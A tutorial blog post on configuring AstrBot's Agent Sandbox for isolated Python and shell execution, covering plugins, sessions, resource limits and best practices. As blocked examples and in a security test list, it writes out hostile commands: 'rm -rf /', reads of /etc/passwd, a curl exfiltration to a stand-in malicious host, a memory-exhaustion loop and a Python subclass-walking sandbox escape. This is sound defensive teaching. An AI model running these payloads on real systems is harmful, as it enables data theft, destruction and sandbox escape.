How to Use AstrBot's Agent Sandbox for Safe Code Execution
Problem
When I built an AI chatbot that could execute Python code, I quickly ran into a scary realization: what if a user asks the bot to run os.system('rm -rf /') or to read sensitive files like /etc/passwd?
I tried using Python’s built-in exec() function:
    def run_user_code(code: str):
        try:
            exec(code)
        except Exception as e:
            print(f"Error: {e}")

    # A user sends this through my chatbot
    run_user_code("import os; os.system('cat /etc/passwd')")

This is obviously dangerous. The code runs with full privileges on my server.
Why Sandboxing Matters
The core problem with unrestricted code execution is attack surface. A malicious user could:
- Read sensitive files (credentials, config files)
- Delete critical data
- Make unauthorized network requests
- Consume all system resources (fork bombs, memory exhaustion)
- Pivot to other parts of the infrastructure
Traditional solutions like RestrictedPython only provide partial protection. They can restrict some builtins and attributes, but determined attackers can often bypass these restrictions through various Python internals.
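To make the bypass risk concrete, here is a minimal sketch. It is neither RestrictedPython nor AstrBot code: `naive_restricted_exec` is a hypothetical helper that strips every builtin before calling exec(). That is enough to stop an import statement, but plain attribute access still reaches every class loaded in the interpreter, which is the usual starting point for an escape.

```python
def naive_restricted_exec(code: str) -> dict:
    """Hypothetical helper: run code with every builtin removed."""
    scope = {"__builtins__": {}}
    exec(code, scope)
    return scope


# The import statement fails because __import__ is no longer available.
try:
    naive_restricted_exec("import os")
    import_blocked = False
except ImportError:
    import_blocked = True

# Attribute access needs no builtins: walk from a tuple up to object,
# then list every class currently loaded in the interpreter.
payload = "names = [c.__name__ for c in ().__class__.__base__.__subclasses__()]"
leaked = naive_restricted_exec(payload)["names"]

print("import blocked:", import_blocked)
print("classes reachable anyway:", len(leaked))
```

The payload only lists class names, so it is harmless to run, but it shows that the restricted namespace is not a real boundary.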
What I needed was true isolation - a separate environment where code runs with limited capabilities, and failures don’t affect the host system.
What is AstrBot’s Agent Sandbox?
AstrBot is an open-source chatbot framework that includes a built-in Agent Sandbox feature. The sandbox provides isolated Python and shell execution environments for AI agents.
The architecture looks like this:
┌─────────────────────────────────────────────────────────────┐
│                      User/LLM Request                       │
└─────────────────────────┬───────────────────────────────────┘
                          │
                          ▼
┌─────────────────────────────────────────────────────────────┐
│                    Security Policy Check                    │
│   ┌─────────────────────────────────────────────────────┐   │
│   │ - Module whitelist/blacklist                        │   │
│   │ - Command validation                                │   │
│   │ - Resource limit enforcement                        │   │
│   └─────────────────────────────────────────────────────┘   │
└─────────────────────────┬───────────────────────────────────┘
                          │
                          ▼
┌─────────────────────────────────────────────────────────────┐
│                      Isolated Runtime                       │
│   ┌─────────────────────────────────────────────────────┐   │
│   │ - Separate process/container                        │   │
│   │ - Limited filesystem access                         │   │
│   │ - Network restrictions                              │   │
│   │ - Memory/CPU/time limits                            │   │
│   └─────────────────────────────────────────────────────┘   │
└─────────────────────────┬───────────────────────────────────┘
                          │
                          ▼
┌─────────────────────────────────────────────────────────────┐
│                        Output Filter                        │
│   ┌─────────────────────────────────────────────────────┐   │
│   │ - Sanitize results                                  │   │
│   │ - Redact sensitive information                      │   │
│   └─────────────────────────────────────────────────────┘   │
└─────────────────────────┬───────────────────────────────────┘
                          │
                          ▼
┌─────────────────────────────────────────────────────────────┐
│                         Safe Result                         │
└─────────────────────────────────────────────────────────────┘

Key capabilities:
- Python execution: Run Python code with restricted module access
- Shell execution: Execute shell commands with filtering
- Session management: Maintain state across multiple code executions
- Resource limits: Control memory, CPU, and execution time
- Web ChatUI integration: Access sandbox through AstrBot’s web interface
Setting Up the Sandbox
Prerequisites
- AstrBot installed (version 3.4.0 or later)
- Python 3.8+
- Docker (recommended for full isolation)
Installation
First, I cloned and installed AstrBot:
    git clone https://github.com/Soulter/AstrBot.git
    cd AstrBot
    pip install -r requirements.txt

Enabling the Agent Sandbox
In the AstrBot configuration, I enabled the sandbox feature:
    agent_sandbox:
      enabled: true
      backend: "docker"  # or "local" for process isolation
      security_policy:
        restricted_modules:
          - os
          - subprocess
          - socket
          - ctypes
          - sys
        memory_limit: "256m"
        cpu_limit: 1
        execution_timeout: 30
        network_access: "restricted"
        allowed_commands:
          - ls
          - cat
          - grep
          - python

The backend option determines the isolation level:
- docker: Full container isolation (recommended)
- local: Process-based isolation (lighter but less secure)
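To give a feel for what process-based isolation means in general, here is a minimal sketch using only the standard library. It is not AstrBot's "local" backend: `run_isolated` is a hypothetical helper, and the result keys simply mirror the ones used later in this post. It contains crashes and runaway loops, but it does nothing to restrict filesystem or network access, which is why the container backend is the safer choice.

```python
import subprocess
import sys
import tempfile


def run_isolated(code: str, timeout: float = 5.0) -> dict:
    """Hypothetical helper: run code in a separate interpreter with a timeout."""
    # A throwaway working directory keeps relative file writes out of the host project.
    with tempfile.TemporaryDirectory() as workdir:
        try:
            proc = subprocess.run(
                [sys.executable, "-I", "-c", code],  # -I: isolated mode, ignores PYTHON* variables
                cwd=workdir,
                capture_output=True,
                text=True,
                timeout=timeout,  # the child is killed when this expires
            )
        except subprocess.TimeoutExpired:
            return {"output": "", "error": f"Timed out after {timeout}s"}
    if proc.returncode != 0:
        return {"output": proc.stdout, "error": proc.stderr.strip()}
    return {"output": proc.stdout.strip(), "error": None}


print(run_isolated("print(2 + 2)"))  # {'output': '4', 'error': None}
```

A crash or infinite loop in the child never takes down the host process, which is the core idea both backends share.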
Executing Python Code Safely
Basic Code Execution
I created a simple plugin to execute user-provided Python code:
    from astrbot.api.event import filter, AstrMessageEvent
    from astrbot.api.star import Context, Star, register

    @register("sandbox_executor", "author", "Safe code execution plugin", "1.0.0", "https://github.com/example")
    class SandboxExecutorPlugin(Star):
        @filter.command("run")
        async def execute_code(self, event: AstrMessageEvent):
            # Extract code from message: /run print('hello')
            code = event.get_plain_text().replace("/run ", "")

            # Execute in sandbox
            result = await self.context.agent_sandbox.execute_python(code)

            if result.get("error"):
                yield event.plain_result(f"Error: {result['error']}")
            elif result.get("security_violations"):
                yield event.plain_result("Blocked: Security violation detected")
            else:
                yield event.plain_result(f"Output: {result['output']}")

When I tested with safe code:
    User: /run print(2 + 2)
    Bot: Output: 4

    User: /run [x**2 for x in range(10)]
    Bot: Output: [0, 1, 4, 9, 16, 25, 36, 49, 64, 81]

Handling Security Violations
When I tried to import restricted modules:
    User: /run import os; os.system('whoami')
    Bot: Blocked: Security violation detected

The sandbox detected the attempt to import os and blocked execution.
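How the sandbox detects the import is not something this post can show, but one plausible approach is a static scan of the code before it runs. The sketch below assumes that approach: `find_restricted_imports` is a hypothetical function, and the module set is copied from the configuration above.

```python
import ast
from typing import List

# Copied from the restricted_modules list in the configuration above.
RESTRICTED_MODULES = {"os", "subprocess", "socket", "ctypes", "sys"}


def find_restricted_imports(code: str, restricted=RESTRICTED_MODULES) -> List[str]:
    """Hypothetical check: return restricted top-level modules named in import statements."""
    hits = []
    for node in ast.walk(ast.parse(code)):
        if isinstance(node, ast.Import):
            names = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            names = [node.module or ""]  # module is None for "from . import x"
        else:
            continue
        for name in names:
            root = name.split(".")[0]  # "os.path" counts as "os"
            if root in restricted:
                hits.append(root)
    return hits


print(find_restricted_imports("import os; os.system('whoami')"))  # ['os']
print(find_restricted_imports("__import__('subprocess')"))        # []
```

The second call returns an empty list because `__import__` is an ordinary function call, not an import statement. A static scan like this is a useful first filter, but it cannot be the only defense.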
I also tested what happens with resource exhaustion attempts:
    # This tries to consume all memory
    x = []
    while True:
        x.append(' ' * 1000000)

The sandbox killed the process after hitting the memory limit:

    User: /run x = []\nwhile True:\n x.append(' ' * 1000000)
    Bot: Error: Memory limit exceeded (256MB)

Safe Shell Command Execution
The sandbox also supports shell command execution with filtering:
    from astrbot.api.event import filter, AstrMessageEvent
    from astrbot.api.star import Context, Star, register

    @register("shell_executor", "author", "Shell command plugin", "1.0.0", "https://github.com/example")
    class ShellExecutorPlugin(Star):
        @filter.command("shell")
        async def execute_shell(self, event: AstrMessageEvent):
            command = event.get_plain_text().replace("/shell ", "")

            # Execute shell command in sandbox
            result = await self.context.agent_sandbox.execute_shell(command)

            if result.get("blocked"):
                yield event.plain_result(f"Blocked: {result['reason']}")
            elif result.get("error"):
                yield event.plain_result(f"Error: {result['error']}")
            else:
                yield event.plain_result(f"Output:\n{result['output']}")

Testing with allowed commands:
    User: /shell ls -la
    Bot: Output:
    total 8
    drwxr-xr-x 2 root root 4096 Mar 3 10:00 .
    drwxr-xr-x 3 root root 4096 Mar 3 10:00 ..

But dangerous commands get blocked:
    User: /shell rm -rf /
    Bot: Blocked: Command 'rm' not in allowed list

    User: /shell curl http://malicious-site.com/exfil?data=$(cat /etc/passwd)
    Bot: Blocked: Command 'curl' not in allowed list

Session-Level Resource Management
One powerful feature is session-based execution. This allows maintaining state across multiple code runs within a session.
Why Sessions Matter
Without sessions, each code execution starts fresh. But sometimes I need to:
- Load a large dataset once, then query it multiple times
- Train a model incrementally
- Maintain variables across conversation turns
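The idea behind keeping state can be pictured as one namespace dictionary that is reused for every snippet in a session. The sketch below illustrates only that idea: `SessionNamespace` is a hypothetical class, and it calls exec() directly, so it offers none of the isolation a real sandbox session would add around it.

```python
class SessionNamespace:
    """Hypothetical stand-in for a sandbox session: one namespace per session."""

    def __init__(self) -> None:
        self.scope: dict = {}

    def run(self, code: str) -> None:
        # Reusing the same dict lets later snippets see earlier variables.
        exec(code, self.scope)


session = SessionNamespace()
session.run("data = [100, 200, 150]")
session.run("mean = sum(data) / len(data)")
print(session.scope["mean"])  # 150.0

# A fresh namespace starts empty, like a stateless execution.
stateless = SessionNamespace()
try:
    stateless.run("print(data)")
except NameError as exc:
    print("stateless run failed:", exc)
```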
Using Sessions
    from astrbot.api.event import filter, AstrMessageEvent
    from astrbot.api.star import Context, Star, register

    @register("session_executor", "author", "Session-based execution", "1.0.0", "https://github.com/example")
    class SessionExecutorPlugin(Star):
        def __init__(self, context: Context):
            super().__init__(context)
            self.sessions = {}  # user_id -> session_id

        @filter.command("session_start")
        async def start_session(self, event: AstrMessageEvent):
            user_id = event.get_sender_id()

            # Create a new sandbox session
            session_id = await self.context.agent_sandbox.create_session(
                user_id=user_id,
                timeout=300,  # 5 minute session
                memory_limit="512m"
            )

            self.sessions[user_id] = session_id
            yield event.plain_result(f"Session started: {session_id[:8]}...")

        @filter.command("srun")
        async def execute_in_session(self, event: AstrMessageEvent):
            user_id = event.get_sender_id()
            session_id = self.sessions.get(user_id)

            if not session_id:
                yield event.plain_result("No active session. Use /session_start first.")
                return

            code = event.get_plain_text().replace("/srun ", "")

            # Execute in existing session (state persists)
            result = await self.context.agent_sandbox.execute_python(
                code,
                session_id=session_id
            )

            yield event.plain_result(f"Output: {result.get('output', result.get('error'))}")

        @filter.command("session_end")
        async def end_session(self, event: AstrMessageEvent):
            user_id = event.get_sender_id()
            session_id = self.sessions.pop(user_id, None)

            if session_id:
                await self.context.agent_sandbox.destroy_session(session_id)
                yield event.plain_result("Session ended and resources cleaned up.")
            else:
                yield event.plain_result("No active session to end.")

A practical example - loading and analyzing data:
    User: /session_start
    Bot: Session started: a1b2c3d4...

    User: /srun import pandas as pd
    Bot: Output: None

    User: /srun df = pd.read_csv('data.csv') # Pre-uploaded file
    Bot: Output: None

    User: /srun df.head()
    Bot: Output:
       id     name  value
    0   1    Alice    100
    1   2      Bob    200
    2   3  Charlie    150

    User: /srun df['value'].mean()
    Bot: Output: 150.0

    User: /session_end
    Bot: Session ended and resources cleaned up.

The session kept df in memory across multiple executions.
Session Lifecycle
The session lifecycle follows this pattern:
┌────────────────┐
│ Create Session │ ──→ Allocate resources, assign session_id
└───────┬────────┘
        │
        ▼
┌────────────────┐
│ Execute Code   │ ──→ Run in session context (state persists)
└───────┬────────┘
        │
        ▼
┌────────────────┐
│ Execute More   │ ──→ Previous variables/functions available
└───────┬────────┘
        │
        ▼
┌────────────────┐
│ Destroy Session│ ──→ Clean up memory, release resources
└────────────────┘

Sessions automatically expire after the configured timeout, preventing resource leaks from abandoned sessions.
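Timeout-based expiry can be sketched with a small registry that records when each session was last used. This is an illustration under assumptions, not AstrBot's implementation: `SessionRegistry` and its methods are hypothetical names, and the clock is injectable only so the example can simulate time passing.

```python
import time
import uuid
from typing import Callable, Dict, List


class SessionRegistry:
    """Hypothetical registry that drops sessions idle longer than `timeout` seconds."""

    def __init__(self, timeout: float, clock: Callable[[], float] = time.monotonic):
        self.timeout = timeout
        self.clock = clock
        self.last_used: Dict[str, float] = {}

    def create(self) -> str:
        session_id = uuid.uuid4().hex
        self.last_used[session_id] = self.clock()
        return session_id

    def touch(self, session_id: str) -> bool:
        """Refresh a session; return False if it is unknown or already expired."""
        self.expire()
        if session_id not in self.last_used:
            return False
        self.last_used[session_id] = self.clock()
        return True

    def expire(self) -> List[str]:
        """Remove and return every session idle for longer than the timeout."""
        now = self.clock()
        stale = [sid for sid, used in self.last_used.items() if now - used > self.timeout]
        for sid in stale:
            del self.last_used[sid]
        return stale


# Simulated clock so the example runs instantly.
fake_now = [0.0]
registry = SessionRegistry(timeout=300, clock=lambda: fake_now[0])
sid = registry.create()

fake_now[0] = 200.0
print(registry.touch(sid))  # True: still within the 300 second window

fake_now[0] = 501.0
print(registry.touch(sid))  # False: idle for 301 seconds, so it was dropped
```

In a real deployment, the point where a session is dropped is also where its sandbox resources would be released.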
Using the Sandbox via Web ChatUI
AstrBot includes a web interface that integrates with the sandbox. After starting AstrBot with the web plugin:
    python main.py --web

The web interface is available at http://localhost:6185.
In the ChatUI, I can enable agent mode which allows the AI to execute code through the sandbox. When the AI needs to run calculations or process data, it automatically uses the sandbox.
The ChatUI shows:
- Code being executed
- Output or errors
- Execution time
- Resource usage
This is useful for:
- Quick data analysis tasks
- Mathematical computations
- File processing workflows
Advanced Security Configuration
Custom Module Restrictions
I can fine-tune which modules are allowed:
    agent_sandbox:
      security_policy:
        # Completely block these modules
        restricted_modules:
          - os
          - subprocess
          - socket
          - ctypes
          - sys
          - importlib
          - builtins

        # Allow specific functions from otherwise restricted modules
        module_overrides:
          os.path:
            allowed: true
            functions:
              - join
              - basename
              - dirname
              - exists

        # Whitelist approach (more secure but restrictive)
        mode: "whitelist"
        allowed_modules:
          - math
          - json
          - re
          - datetime
          - collections

Network Access Control
For use cases requiring network access (like web search):
    agent_sandbox:
      security_policy:
        network_access: "restricted"
        allowed_domains:
          - "api.openai.com"
          - "search.example.com"
        # Block all other network requests

Resource Limits
Adjust limits based on expected workload:
    agent_sandbox:
      security_policy:
        memory_limit: "512m"     # Per execution
        cpu_limit: 2             # Number of CPU cores
        execution_timeout: 60    # Seconds
        max_output_size: "10m"   # Limit output size
        max_file_size: "100m"    # Limit file operations

Best Practices
What I Learned the Hard Way
- Start restrictive, then relax: Begin with a whitelist approach and add permissions as needed, rather than starting permissive and trying to tighten later.
- Test with real attack patterns: I created a test suite with common attack vectors:

      # tests/test_sandbox_security.py
      ATTACK_VECTORS = [
          "import os; os.system('id')",
          "__import__('subprocess').call(['cat', '/etc/passwd'])",
          "exec(open('/etc/passwd').read())",
          "().__class__.__bases__[0].__subclasses__()[137]('id', shell=True).communicate()",
      ]

- Monitor resource usage: Even with limits, track CPU/memory trends to catch slow resource leaks.
- Log everything: Security events, violations, and execution patterns help identify attack attempts.
- Session cleanup is critical: Always implement session cleanup, especially for web applications where users might not explicitly end sessions.
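A list of attack vectors like the one above is only useful with a harness that reports which ones get through. The sketch below assumes a synchronous `execute` callable that returns a dict with the same "error" and "security_violations" keys as the plugin code earlier. `unblocked_vectors` and `keyword_filter_executor` are hypothetical names, and the stub executor never runs the code it is given.

```python
from typing import Callable, Dict, List

ATTACK_VECTORS = [
    "import os; os.system('id')",
    "__import__('subprocess').call(['cat', '/etc/passwd'])",
    "exec(open('/etc/passwd').read())",
]


def unblocked_vectors(execute: Callable[[str], Dict], vectors: List[str]) -> List[str]:
    """Return the vectors that the executor neither flagged nor failed on."""
    escaped = []
    for code in vectors:
        result = execute(code)
        if not (result.get("security_violations") or result.get("error")):
            escaped.append(code)
    return escaped


def keyword_filter_executor(code: str) -> Dict:
    """Hypothetical stand-in for a sandbox call: substring check only, runs nothing."""
    if "import os" in code:
        return {"security_violations": ["os"]}
    return {"output": ""}


for code in unblocked_vectors(keyword_filter_executor, ATTACK_VECTORS):
    print("NOT BLOCKED:", code)
```

With the deliberately weak stub, two of the three vectors are reported as not blocked. Pointing the same harness at the real sandbox call (awaited, since the plugin API shown earlier is async) should leave the list empty.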
Common Mistakes
- Relying only on module restrictions: Advanced attackers can use Python’s introspection to access blocked functionality. Always use container/process isolation as the primary defense.
- Ignoring timeout configuration: A complex computation might hang indefinitely without proper timeout settings.
- Allowing too many shell commands: Each allowed command is potential attack surface. The allowed_commands list should be minimal.
- Not handling errors gracefully: Exposing internal error messages can leak system information. Sanitize error output.
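For the last point, sanitizing can be as simple as returning only the final traceback line with file paths masked. The following is a minimal sketch: `sanitize_error` and the path pattern are hypothetical and would need tuning for a real deployment.

```python
import re

# Hypothetical pattern: two or more "/segment" parts in a row look like an absolute path.
PATH_PATTERN = re.compile(r"(?:/[\w.\-]+){2,}")


def sanitize_error(raw: str, max_length: int = 200) -> str:
    """Keep only the final traceback line and mask absolute paths."""
    lines = [line for line in raw.strip().splitlines() if line.strip()]
    last_line = lines[-1] if lines else "Unknown error"
    return PATH_PATTERN.sub("<path>", last_line)[:max_length]


raw_error = (
    "Traceback (most recent call last):\n"
    '  File "/srv/bot/sandbox/runner.py", line 12, in <module>\n'
    "FileNotFoundError: [Errno 2] No such file or directory: '/home/bot/secrets/data.csv'"
)
print(sanitize_error(raw_error))
# FileNotFoundError: [Errno 2] No such file or directory: '<path>'
```

The user still learns what went wrong, but not where the bot lives on disk or how its directories are laid out.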
The Reason
The key insight is that secure code execution requires multiple layers of defense:
- Container/process isolation prevents direct system access
- Module restrictions limit what the code can import
- Resource limits prevent denial-of-service attacks
- Command filtering controls shell execution
- Session management prevents resource leaks
No single layer is sufficient, but together they provide strong protection.
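To make one of these layers concrete, here is a minimal sketch of command filtering. It is an assumption about how such a filter could work, not AstrBot's code: `check_command` is a hypothetical function, and the allowed set is copied from the configuration earlier in this post.

```python
import shlex
from typing import Optional

# Copied from the allowed_commands list in the configuration above.
ALLOWED_COMMANDS = {"ls", "cat", "grep", "python"}
# Characters that would let one command line chain or substitute other commands.
SHELL_METACHARACTERS = set(";|&$`<>\n")


def check_command(command: str, allowed=ALLOWED_COMMANDS) -> Optional[str]:
    """Return a rejection reason, or None if the command passes the filter."""
    if any(ch in SHELL_METACHARACTERS for ch in command):
        return "Shell metacharacters are not allowed"
    try:
        tokens = shlex.split(command)
    except ValueError:  # for example, an unterminated quote
        return "Could not parse command"
    if not tokens:
        return "Empty command"
    if tokens[0] not in allowed:
        return f"Command '{tokens[0]}' not in allowed list"
    return None


print(check_command("ls -la"))        # None
print(check_command("rm -rf /"))      # Command 'rm' not in allowed list
print(check_command("ls; rm -rf /"))  # Shell metacharacters are not allowed
```

A filter like this still lets cat read any file the sandbox can see, which is exactly why it has to sit on top of filesystem isolation rather than replace it.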
Summary
In this post, I showed how to use AstrBot’s Agent Sandbox for secure code execution. I covered setting up the sandbox, executing Python and shell commands safely, managing sessions for stateful execution, and configuring security policies.
The key point is that sandboxing AI-generated code requires defense in depth - isolation, restrictions, limits, and monitoring all working together. AstrBot’s built-in sandbox provides these layers out of the box, making it easier to build secure AI agents.
Final Words + More Resources
My intention with this article was to help others by sharing my knowledge and experience. If you want to contact me, you can reach me by email.
Here are also the most important links from this article along with some further resources that will help you in this scope:
- 👨‍💻 AstrBot GitHub Repository
- 👨‍💻 AstrBot Documentation
- 👨‍💻 llm-sandbox
- 👨‍💻 OWASP Code Injection Prevention
Oh, and if you found these resources useful, don’t forget to support me by starring the repo on GitHub!